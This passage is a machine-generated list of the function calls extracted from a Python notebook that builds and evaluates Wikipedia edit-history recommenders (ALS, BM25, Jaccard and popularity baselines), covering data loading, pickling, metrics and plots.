feather\n'), ((1887, 1943), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""all_histories_2021-05-28.feather"""'], {}), "('all_histories_2021-05-28.feather')\n", (1907, 1943), False, 'from pyarrow import feather\n'), ((2782, 2809), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 8)'}), '(figsize=(20, 8))\n', (2792, 2809), True, 'import matplotlib.pyplot as plt\n'), ((2809, 2829), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(1)'], {}), '(1, 2, 1)\n', (2820, 2829), True, 'import matplotlib.pyplot as plt\n'), ((2892, 2929), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of edits by user"""'], {}), "('Number of edits by user')\n", (2902, 2929), True, 'import matplotlib.pyplot as plt\n'), ((2930, 2950), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(2)', '(2)'], {}), '(1, 2, 2)\n', (2941, 2950), True, 'import matplotlib.pyplot as plt\n'), ((3009, 3027), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 200]'], {}), '([0, 200])\n', (3017, 3027), True, 'import matplotlib.pyplot as plt\n'), ((3027, 3064), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Number of edits by user"""'], {}), "('Number of edits by user')\n", (3037, 3064), True, 'import matplotlib.pyplot as plt\n'), ((3175, 3202), 'numpy.sum', 'np.sum', (['(edit_counts > thres)'], {}), '(edit_counts > thres)\n', (3181, 3202), True, 'import numpy as np\n'), ((3750, 3789), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(1000)'], {}), "('display.max_rows', 1000)\n", (3763, 3789), True, 'import pandas as pd\n'), ((7057, 7136), 'pyarrow.feather.write_feather', 'feather.write_feather', (['clean_histories', '"""../clean_histories_2021-05-28.feather"""'], {}), "(clean_histories, '../clean_histories_2021-05-28.feather')\n", (7078, 7136), False, 'from pyarrow import feather\n'), ((7191, 7252), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../clean_histories_2021-05-28.feather"""'], {}), "('../clean_histories_2021-05-28.feather')\n", (7211, 7252), False, 'from pyarrow import feather\n'), ((8253, 8371), 'wikirecs.save_pickle', 'wr.save_pickle', (['(p2t, 
t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t)', '"""../lookup_tables_2021-05-28.pickle"""'], {}), "((p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t),\n '../lookup_tables_2021-05-28.pickle')\n", (8267, 8371), True, 'import wikirecs as wr\n'), ((8369, 8443), 'wikirecs.save_pickle', 'wr.save_pickle', (['(userids, pageids)', '"""../users_and_pages_2021-05-28.pickle"""'], {}), "((userids, pageids), '../users_and_pages_2021-05-28.pickle')\n", (8383, 8443), True, 'import wikirecs as wr\n'), ((8542, 8594), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (8556, 8594), True, 'import wikirecs as wr\n'), ((8614, 8668), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../users_and_pages_2021-05-28.pickle"""'], {}), "('../users_and_pages_2021-05-28.pickle')\n", (8628, 8668), True, 'import wikirecs as wr\n'), ((8882, 8940), 'wikirecs.dataframe_set_subtract', 'wr.dataframe_set_subtract', (['clean_histories', 'histories_test'], {}), '(clean_histories, histories_test)\n', (8907, 8940), True, 'import wikirecs as wr\n'), ((9217, 9274), 'wikirecs.dataframe_set_subtract', 'wr.dataframe_set_subtract', (['histories_train', 'histories_dev'], {}), '(histories_train, histories_dev)\n', (9242, 9274), True, 'import wikirecs as wr\n'), ((9870, 9949), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_train', '"""../histories_train_2021-05-28.feather"""'], {}), "(histories_train, '../histories_train_2021-05-28.feather')\n", (9891, 9949), False, 'from pyarrow import feather\n'), ((9950, 10025), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_dev', '"""../histories_dev_2021-05-28.feather"""'], {}), "(histories_dev, '../histories_dev_2021-05-28.feather')\n", (9971, 10025), False, 'from pyarrow import feather\n'), ((10026, 10103), 'pyarrow.feather.write_feather', 'feather.write_feather', (['histories_test', '"""../histories_test_2021-05-28.feather"""'], {}), "(histories_test, '../histories_test_2021-05-28.feather')\n", (10047, 10103), False, 'from pyarrow import feather\n'), ((10148, 10206), 'wikirecs.get_resurface_discovery', 'wr.get_resurface_discovery', (['histories_train', 'histories_dev'], {}), '(histories_train, histories_dev)\n', (10174, 10206), True, 'import wikirecs as wr\n'), ((10499, 10607), 'wikirecs.save_pickle', 'wr.save_pickle', (['(resurface_userids, discovery_userids)', '"""../resurface_discovery_users_2021-05-28.pickle"""'], {}), "((resurface_userids, discovery_userids),\n '../resurface_discovery_users_2021-05-28.pickle')\n", (10513, 10607), True, 'import wikirecs as wr\n'), ((10943, 11066), 'pull_edit_histories.get_edit_history', 'get_edit_history', ([], {'user': '"""Thornstrom"""', 'latest_timestamp': '"""2021-05-28T22:02:09Z"""', 'earliest_timestamp': '"""2020-05-28T22:02:09Z"""'}), "(user='Thornstrom', latest_timestamp='2021-05-28T22:02:09Z',\n earliest_timestamp='2020-05-28T22:02:09Z')\n", (10959, 11066), False, 'from pull_edit_histories import get_edit_history\n'), ((11170, 11219), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': '"""Rama"""'}), "(all_histories, user='Rama')\n", (11191, 11219), True, 'import wikirecs as wr\n'), ((11221, 11270), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': '"""Meow"""'}), "(all_histories, user='Meow')\n", (11242, 11270), True, 'import wikirecs as wr\n'), ((11592, 11646), 'numpy.array', 'np.array', (['[p2i[p] for p in 
for_implicit.pageid.values]'], {}), '([p2i[p] for p in for_implicit.pageid.values])\n', (11600, 11646), True, 'import numpy as np\n'), ((11653, 11707), 'numpy.array', 'np.array', (['[u2i[u] for u in for_implicit.userid.values]'], {}), '([u2i[u] for u in for_implicit.userid.values])\n', (11661, 11707), True, 'import numpy as np\n'), ((11731, 11782), 'scipy.sparse.coo_matrix', 'coo_matrix', (['(for_implicit.edits.values, (row, col))'], {}), '((for_implicit.edits.values, (row, col)))\n', (11741, 11782), False, 'from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix\n'), ((11803, 11834), 'scipy.sparse.csc_matrix', 'csc_matrix', (['implicit_matrix_coo'], {}), '(implicit_matrix_coo)\n', (11813, 11834), False, 'from scipy.sparse import csr_matrix, csc_matrix, lil_matrix, coo_matrix\n'), ((11849, 11920), 'wikirecs.save_pickle', 'wr.save_pickle', (['implicit_matrix', '"""../implicit_matrix_2021-05-28.pickle"""'], {}), "(implicit_matrix, '../implicit_matrix_2021-05-28.pickle')\n", (11863, 11920), True, 'import wikirecs as wr\n'), ((11974, 12028), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (11988, 12028), True, 'import wikirecs as wr\n'), ((12726, 12780), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (12740, 12780), True, 'import wikirecs as wr\n'), ((12842, 12894), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (12856, 12894), True, 'import wikirecs as wr\n'), ((12910, 12954), 'implicit.nearest_neighbours.bm25_weight', 'bm25_weight', (['implicit_matrix'], {'K1': '(100)', 'B': '(0.25)'}), '(implicit_matrix, K1=100, B=0.25)\n', (12921, 12954), False, 'from implicit.nearest_neighbours import bm25_weight\n'), ((13044, 13137), 'implicit.als.AlternatingLeastSquares', 'implicit.als.AlternatingLeastSquares', ([], {'factors': 'num_factors', 'regularization': 'regularization'}), '(factors=num_factors, regularization=\n regularization)\n', (13080, 13137), False, 'import implicit\n'), ((13163, 13228), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', "('../als%d_bm25_model.pickle' % num_factors)"], {}), "(model, '../als%d_bm25_model.pickle' % num_factors)\n", (13177, 13228), True, 'import wikirecs as wr\n'), ((13237, 13293), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als200_bm25_model_2021-05-28.pickle"""'], {}), "('../als200_bm25_model_2021-05-28.pickle')\n", (13251, 13293), True, 'import wikirecs as wr\n'), ((13741, 13789), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_grid_search.pickle"""'], {}), "('../implicit_grid_search.pickle')\n", (13755, 13789), True, 'import wikirecs as wr\n'), ((13791, 13824), 'pandas.DataFrame', 'pd.DataFrame', (['grid_search_results'], {}), '(grid_search_results)\n', (13803, 13824), True, 'import pandas as pd\n'), ((14076, 14129), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_grid_search_bm25.pickle"""'], {}), "('../implicit_grid_search_bm25.pickle')\n", (14090, 14129), True, 'import wikirecs as wr\n'), ((14462, 14502), 'implicit.nearest_neighbours.bm25_weight', 'bm25_weight', (['implicit_matrix'], {'K1': '(20)', 'B': '(1)'}), '(implicit_matrix, K1=20, B=1)\n', (14473, 14502), False, 'from implicit.nearest_neighbours import bm25_weight\n'), ((14747, 14769), 'implicit.nearest_neighbours.BM25Recommender', 'BM25Recommender', (['K1', 'B'], {}), 
'(K1, B)\n', (14762, 14769), False, 'from implicit.nearest_neighbours import BM25Recommender\n'), ((14798, 14851), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', '"""../bm25_model_2021-05-28.pkl"""'], {}), "(model, '../bm25_model_2021-05-28.pkl')\n", (14812, 14851), True, 'import wikirecs as wr\n'), ((15881, 15922), 'wikirecs.save_pickle', 'wr.save_pickle', (['model', '"""b25_model.pickle"""'], {}), "(model, 'b25_model.pickle')\n", (15895, 15922), True, 'import wikirecs as wr\n'), ((15932, 15966), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""b25_model.pickle"""'], {}), "('b25_model.pickle')\n", (15946, 15966), True, 'import wikirecs as wr\n'), ((16231, 16279), 'wikirecs.print_user_history', 'wr.print_user_history', (['clean_histories'], {'userid': 'u'}), '(clean_histories, userid=u)\n', (16252, 16279), True, 'import wikirecs as wr\n'), ((16568, 16608), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als150_model.pickle"""'], {}), "('../als150_model.pickle')\n", (16582, 16608), True, 'import wikirecs as wr\n'), ((17024, 17052), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (17034, 17052), True, 'import matplotlib.pyplot as plt\n'), ((17052, 17099), 'matplotlib.pyplot.plot', 'plt.plot', (['embedding[:, 0]', 'embedding[:, 1]', '"""."""'], {}), "(embedding[:, 0], embedding[:, 1], '.')\n", (17060, 17099), True, 'import matplotlib.pyplot as plt\n'), ((18470, 18582), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'emb_df', 'x': '"""dim1"""', 'y': '"""dim2"""', 'hover_name': '"""title"""', 'color': 'key', 'hover_data': "['edit_count']"}), "(data_frame=emb_df, x='dim1', y='dim2', hover_name='title', color\n =key, hover_data=['edit_count'])\n", (18480, 18582), True, 'import plotly.express as px\n'), ((19111, 19236), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'emb_df', 'x': '"""dim1"""', 'y': '"""dim2"""', 'hover_name': '"""title"""', 'color': '"""log_edit_count"""', 'hover_data': "['edit_count']"}), "(data_frame=emb_df, x='dim1', y='dim2', hover_name='title', color\n ='log_edit_count', hover_data=['edit_count'])\n", (19121, 19236), True, 'import plotly.express as px\n'), ((19516, 19577), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_train_2021-05-28.feather"""'], {}), "('../histories_train_2021-05-28.feather')\n", (19536, 19577), False, 'from pyarrow import feather\n'), ((19595, 19655), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_test_2021-05-28.feather"""'], {}), "('../histories_test_2021-05-28.feather')\n", (19615, 19655), False, 'from pyarrow import feather\n'), ((19672, 19731), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_dev_2021-05-28.feather"""'], {}), "('../histories_dev_2021-05-28.feather')\n", (19692, 19731), False, 'from pyarrow import feather\n'), ((19751, 19805), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../implicit_matrix_2021-05-28.pickle"""'], {}), "('../implicit_matrix_2021-05-28.pickle')\n", (19765, 19805), True, 'import wikirecs as wr\n'), ((19867, 19919), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../lookup_tables_2021-05-28.pickle"""'], {}), "('../lookup_tables_2021-05-28.pickle')\n", (19881, 19919), True, 'import wikirecs as wr\n'), ((19940, 19994), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../users_and_pages_2021-05-28.pickle"""'], {}), "('../users_and_pages_2021-05-28.pickle')\n", (19954, 19994), True, 'import wikirecs as wr\n'), ((20037, 20101), 'wikirecs.load_pickle', 
'wr.load_pickle', (['"""../resurface_discovery_users_2021-05-28.pickle"""'], {}), "('../resurface_discovery_users_2021-05-28.pickle')\n", (20051, 20101), True, 'import wikirecs as wr\n'), ((20123, 20258), 'wikirecs.display_recs_with_history', 'wr.display_recs_with_history', (['recs', 'userids[:100]', 'histories_test', 'histories_train', 'p2t', 'u2n'], {'recs_to_display': '(5)', 'hist_to_display': '(10)'}), '(recs, userids[:100], histories_test,\n histories_train, p2t, u2n, recs_to_display=5, hist_to_display=10)\n', (20151, 20258), True, 'import wikirecs as wr\n'), ((20360, 20411), 'recommenders.PopularityRecommender', 'recommenders.PopularityRecommender', (['histories_train'], {}), '(histories_train)\n', (20394, 20411), False, 'import recommenders\n'), ((20451, 20507), 'wikirecs.save_pickle', 'wr.save_pickle', (['precs', "('../' + rec_name + '_recs.pickle')"], {}), "(precs, '../' + rec_name + '_recs.pickle')\n", (20465, 20507), True, 'import wikirecs as wr\n'), ((20534, 20647), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'precs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, precs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (20553, 20647), True, 'import wikirecs as wr\n'), ((20727, 20778), 'recommenders.MostRecentRecommender', 'recommenders.MostRecentRecommender', (['histories_train'], {}), '(histories_train)\n', (20761, 20778), False, 'import recommenders\n'), ((20868, 20924), 'wikirecs.save_pickle', 'wr.save_pickle', (['rrecs', "('../' + rec_name + '_recs.pickle')"], {}), "(rrecs, '../' + rec_name + '_recs.pickle')\n", (20882, 20924), True, 'import wikirecs as wr\n'), ((20982, 21095), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'rrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, rrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (21001, 21095), True, 'import wikirecs as wr\n'), ((21188, 21241), 'recommenders.MostFrequentRecommender', 'recommenders.MostFrequentRecommender', (['histories_train'], {}), '(histories_train)\n', (21224, 21241), False, 'import recommenders\n'), ((21333, 21389), 'wikirecs.save_pickle', 'wr.save_pickle', (['frecs', "('../' + rec_name + '_recs.pickle')"], {}), "(frecs, '../' + rec_name + '_recs.pickle')\n", (21347, 21389), True, 'import wikirecs as wr\n'), ((21411, 21524), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'frecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, frecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (21430, 21524), True, 'import wikirecs as wr\n'), ((21577, 21631), 'recommenders.MyBM25Recommender', 'recommenders.MyBM25Recommender', (['model', 'implicit_matrix'], {}), '(model, implicit_matrix)\n', (21607, 21631), False, 'import recommenders\n'), ((21751, 21807), 'wikirecs.save_pickle', 'wr.save_pickle', (['brecs', "('../' + rec_name + '_recs.pickle')"], {}), "(brecs, '../' + rec_name + '_recs.pickle')\n", (21765, 21807), True, 'import wikirecs as wr\n'), ((21865, 21978), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'brecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, brecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (21884, 21978), True, 'import wikirecs as wr\n'), ((22170, 22235), 
'wikirecs.save_pickle', 'wr.save_pickle', (['brecs_filtered', "('../' + rec_name + '_recs.pickle')"], {}), "(brecs_filtered, '../' + rec_name + '_recs.pickle')\n", (22184, 22235), True, 'import wikirecs as wr\n'), ((22257, 22386), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', "recs['bm25_filtered']", 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), "(histories_dev, recs['bm25_filtered'], K,\n discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)\n", (22276, 22386), True, 'import wikirecs as wr\n'), ((22427, 22556), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', "recs['bm25_filtered']", 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), "(histories_dev, recs['bm25_filtered'], K,\n discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)\n", (22446, 22556), True, 'import wikirecs as wr\n'), ((22632, 22688), 'wikirecs.load_pickle', 'wr.load_pickle', (['"""../als200_bm25_model_2021-05-28.pickle"""'], {}), "('../als200_bm25_model_2021-05-28.pickle')\n", (22646, 22688), True, 'import wikirecs as wr\n'), ((22888, 22944), 'wikirecs.save_pickle', 'wr.save_pickle', (['irecs', "('../' + rec_name + '_recs.pickle')"], {}), "(irecs, '../' + rec_name + '_recs.pickle')\n", (22902, 22944), True, 'import wikirecs as wr\n'), ((23476, 23541), 'wikirecs.save_pickle', 'wr.save_pickle', (['irecs_filtered', "('../' + rec_name + '_recs.pickle')"], {}), "(irecs_filtered, '../' + rec_name + '_recs.pickle')\n", (23490, 23541), True, 'import wikirecs as wr\n'), ((23628, 23679), 'recommenders.MostRecentRecommender', 'recommenders.MostRecentRecommender', (['histories_train'], {}), '(histories_train)\n', (23662, 23679), False, 'import recommenders\n'), ((23771, 23886), 'recommenders.JaccardRecommender', 'recommenders.JaccardRecommender', (['implicit_matrix'], {'p2i': 'p2i', 't2i': 't2i', 'i2t': 'i2t', 'i2p': 'i2p', 'n2i': 'n2i', 'u2i': 'u2i', 'i2u': 'i2u'}), '(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t,\n i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)\n', (23802, 23886), False, 'import recommenders\n'), ((24156, 24202), 'wikirecs.save_pickle', 'wr.save_pickle', (['jrecs', '"""jaccard-1_recs.pickle"""'], {}), "(jrecs, 'jaccard-1_recs.pickle')\n", (24170, 24202), True, 'import wikirecs as wr\n'), ((24244, 24357), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'jrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, jrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (24263, 24357), True, 'import wikirecs as wr\n'), ((24378, 24513), 'wikirecs.display_recs_with_history', 'wr.display_recs_with_history', (['jrecs', 'userids[:30]', 'histories_test', 'histories_train', 'p2t', 'u2n'], {'recs_to_display': '(5)', 'hist_to_display': '(10)'}), '(jrecs, userids[:30], histories_test,\n histories_train, p2t, u2n, recs_to_display=5, hist_to_display=10)\n', (24406, 24513), True, 'import wikirecs as wr\n'), ((24586, 24701), 'recommenders.JaccardRecommender', 'recommenders.JaccardRecommender', (['implicit_matrix'], {'p2i': 'p2i', 't2i': 't2i', 'i2t': 'i2t', 'i2p': 'i2p', 'n2i': 'n2i', 'u2i': 'u2i', 'i2u': 'i2u'}), '(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t,\n i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)\n', (24617, 24701), False, 'import recommenders\n'), ((25535, 25571), 'recommenders.InterleaveRecommender', 'recommenders.InterleaveRecommender', ([], {}), '()\n', (25569, 25571), False, 'import recommenders\n'), 
((25648, 25706), 'wikirecs.save_pickle', 'wr.save_pickle', (['intrecs', "('../' + rec_name + '_recs.pickle')"], {}), "(intrecs, '../' + rec_name + '_recs.pickle')\n", (25662, 25706), True, 'import wikirecs as wr\n'), ((25731, 25846), 'wikirecs.get_recs_metrics', 'wr.get_recs_metrics', (['histories_dev', 'intrecs', 'K', 'discovery_userids', 'resurface_userids', 'implicit_matrix', 'i2p', 'u2i'], {}), '(histories_dev, intrecs, K, discovery_userids,\n resurface_userids, implicit_matrix, i2p, u2i)\n', (25750, 25846), True, 'import wikirecs as wr\n'), ((31005, 31101), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'results_df', 'x': '"""ndcg_discover"""', 'y': '"""ndcg_resurface"""', 'hover_name': '"""index"""'}), "(data_frame=results_df, x='ndcg_discover', y='ndcg_resurface',\n hover_name='index')\n", (31015, 31101), True, 'import plotly.express as px\n'), ((31206, 31306), 'plotly.express.scatter', 'px.scatter', ([], {'data_frame': 'results_df', 'x': '"""recall_discover"""', 'y': '"""recall_resurface"""', 'hover_name': '"""index"""'}), "(data_frame=results_df, x='recall_discover', y='recall_resurface',\n hover_name='index')\n", (31216, 31306), True, 'import plotly.express as px\n'), ((31635, 31666), 'seaborn.set_theme', 'sns.set_theme', ([], {'style': '"""darkgrid"""'}), "(style='darkgrid')\n", (31648, 31666), True, 'import seaborn as sns\n'), ((31667, 31767), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 48, 'figure.figsize': (8, 5), 'legend.edgecolor': 'k'}"], {}), "({'font.size': 48, 'figure.figsize': (8, 5),\n 'legend.edgecolor': 'k'})\n", (31693, 31767), False, 'import matplotlib\n'), ((31763, 31790), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 7)'}), '(figsize=(12, 7))\n', (31773, 31790), True, 'import matplotlib.pyplot as plt\n'), ((32073, 32093), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '""":k"""'], {}), "(x, y, ':k')\n", (32081, 32093), True, 'import matplotlib.pyplot as plt\n'), ((32154, 32182), 'matplotlib.pyplot.rc', 'plt.rc', (['"""xtick"""'], {'labelsize': '(3)'}), "('xtick', labelsize=3)\n", (32160, 32182), True, 'import matplotlib.pyplot as plt\n'), ((32266, 32295), 'matplotlib.rc', 'matplotlib.rc', (['"""font"""'], {}), "('font', **font)\n", (32279, 32295), False, 'import matplotlib\n'), ((32297, 32317), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '""":k"""'], {}), "(x, y, ':k')\n", (32305, 32317), True, 'import matplotlib.pyplot as plt\n'), ((32317, 32351), 'matplotlib.pyplot.plot', 'plt.plot', (['A', 'B', '"""."""'], {'MarkerSize': '(15)'}), "(A, B, '.', MarkerSize=15)\n", (32325, 32351), True, 'import matplotlib.pyplot as plt\n'), ((32709, 32759), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Recall@20 discovery (%)"""'], {'fontsize': '(20)'}), "('Recall@20 discovery (%)', fontsize=20)\n", (32719, 32759), True, 'import matplotlib.pyplot as plt\n'), ((32759, 32809), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Recall@20 resurface (%)"""'], {'fontsize': '(20)'}), "('Recall@20 resurface (%)', fontsize=20)\n", (32769, 32809), True, 'import matplotlib.pyplot as plt\n'), ((32809, 32825), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 3]'], {}), '([0, 3])\n', (32817, 32825), True, 'import matplotlib.pyplot as plt\n'), ((32825, 32843), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[-2, 85]'], {}), '([-2, 85])\n', (32833, 32843), True, 'import matplotlib.pyplot as plt\n'), ((32850, 32859), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32857, 32859), True, 'import matplotlib.pyplot as plt\n'), 
((33146, 33205), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""../histories_dev_2021-05-28.feather"""'], {}), "('../histories_dev_2021-05-28.feather')\n", (33166, 33205), False, 'from pyarrow import feather\n'), ((33207, 33235), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33217, 33235), True, 'import matplotlib.pyplot as plt\n'), ((33396, 33425), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33406, 33425), True, 'import matplotlib.pyplot as plt\n'), ((33427, 33455), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33437, 33455), True, 'import matplotlib.pyplot as plt\n'), ((33605, 33634), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33615, 33634), True, 'import matplotlib.pyplot as plt\n'), ((33636, 33664), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(15, 10)'}), '(figsize=(15, 10))\n', (33646, 33664), True, 'import matplotlib.pyplot as plt\n'), ((33814, 33843), 'matplotlib.pyplot.legend', 'plt.legend', (['recommender_names'], {}), '(recommender_names)\n', (33824, 33843), True, 'import matplotlib.pyplot as plt\n'), ((33880, 33911), 'seaborn.set_theme', 'sns.set_theme', ([], {'style': '"""darkgrid"""'}), "(style='darkgrid')\n", (33893, 33911), True, 'import seaborn as sns\n'), ((33912, 34012), 'matplotlib.rcParams.update', 'matplotlib.rcParams.update', (["{'font.size': 18, 'figure.figsize': (8, 5), 'legend.edgecolor': 'k'}"], {}), "({'font.size': 18, 'figure.figsize': (8, 5),\n 'legend.edgecolor': 'k'})\n", (33938, 34012), False, 'import matplotlib\n'), ((34006, 34033), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (34016, 34033), True, 'import matplotlib.pyplot as plt\n'), ((34208, 34306), 'matplotlib.pyplot.legend', 'plt.legend', (["['ALS', 'BM25']"], {'title': '"""Algorithm"""', 'fontsize': '(16)', 'title_fontsize': '(16)', 'facecolor': '"""w"""'}), "(['ALS', 'BM25'], title='Algorithm', fontsize=16, title_fontsize=\n 16, facecolor='w')\n", (34218, 34306), True, 'import matplotlib.pyplot as plt\n'), ((34301, 34330), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""@N"""'], {'fontsize': '(20)'}), "('@N', fontsize=20)\n", (34311, 34330), True, 'import matplotlib.pyplot as plt\n'), ((34330, 34377), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Discovery recall (%)"""'], {'fontsize': '(20)'}), "('Discovery recall (%)', fontsize=20)\n", (34340, 34377), True, 'import matplotlib.pyplot as plt\n'), ((37355, 37424), 'recommenders.ImplicitCollaborativeRecommender', 'recommenders.ImplicitCollaborativeRecommender', (['model', 'implicit_matrix'], {}), '(model, implicit_matrix)\n', (37400, 37424), False, 'import recommenders\n'), ((37948, 37972), 'numpy.random.shuffle', 'np.random.shuffle', (['index'], {}), '(index)\n', (37965, 37972), True, 'import numpy as np\n'), ((38219, 38243), 'numpy.random.shuffle', 'np.random.shuffle', (['index'], {}), '(index)\n', (38236, 38243), True, 'import numpy as np\n'), ((38888, 38918), 'numpy.array', 'np.array', (['[r[1] for r in runs]'], {}), '([r[1] for r in runs])\n', (38896, 38918), True, 'import numpy as np\n'), ((38935, 38952), 'numpy.sum', 'np.sum', (['(lens == 1)'], {}), '(lens == 1)\n', (38941, 38952), True, 'import numpy as np\n'), ((12242, 12290), 'numpy.sum', 'np.sum', (['(implicit_matrix[:, veditors] > 0)'], {'axis': '(1)'}), '(implicit_matrix[:, veditors] > 0, axis=1)\n', 
(12248, 12290), True, 'import numpy as np\n'), ((12626, 12677), 'wikirecs.print_user_history', 'wr.print_user_history', (['all_histories'], {'user': 'i2n[ved]'}), '(all_histories, user=i2n[ved])\n', (12647, 12677), True, 'import wikirecs as wr\n'), ((28147, 28168), 'pandas.DataFrame', 'pd.DataFrame', (['results'], {}), '(results)\n', (28159, 28168), True, 'import pandas as pd\n'), ((28530, 28584), 'seaborn.scatterplot', 'sns.scatterplot', (['x', 'y'], {'data': 'data', 'size': '(8)', 'legend': '(False)'}), '(x, y, data=data, size=8, legend=False)\n', (28545, 28584), True, 'import seaborn as sns\n'), ((28887, 28903), 'matplotlib.pyplot.title', 'plt.title', (['title'], {}), '(title)\n', (28896, 28903), True, 'import matplotlib.pyplot as plt\n'), ((28908, 28926), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['xlabel'], {}), '(xlabel)\n', (28918, 28926), True, 'import matplotlib.pyplot as plt\n'), ((28931, 28949), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['ylabel'], {}), '(ylabel)\n', (28941, 28949), True, 'import matplotlib.pyplot as plt\n'), ((33030, 33076), 'wikirecs.load_pickle', 'wr.load_pickle', (["('../' + rname + '_recs.pickle')"], {}), "('../' + rname + '_recs.pickle')\n", (33044, 33076), True, 'import wikirecs as wr\n'), ((33286, 33333), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)'], {}), '(histories_dev, recs[rname], 20)\n', (33301, 33333), True, 'import wikirecs as 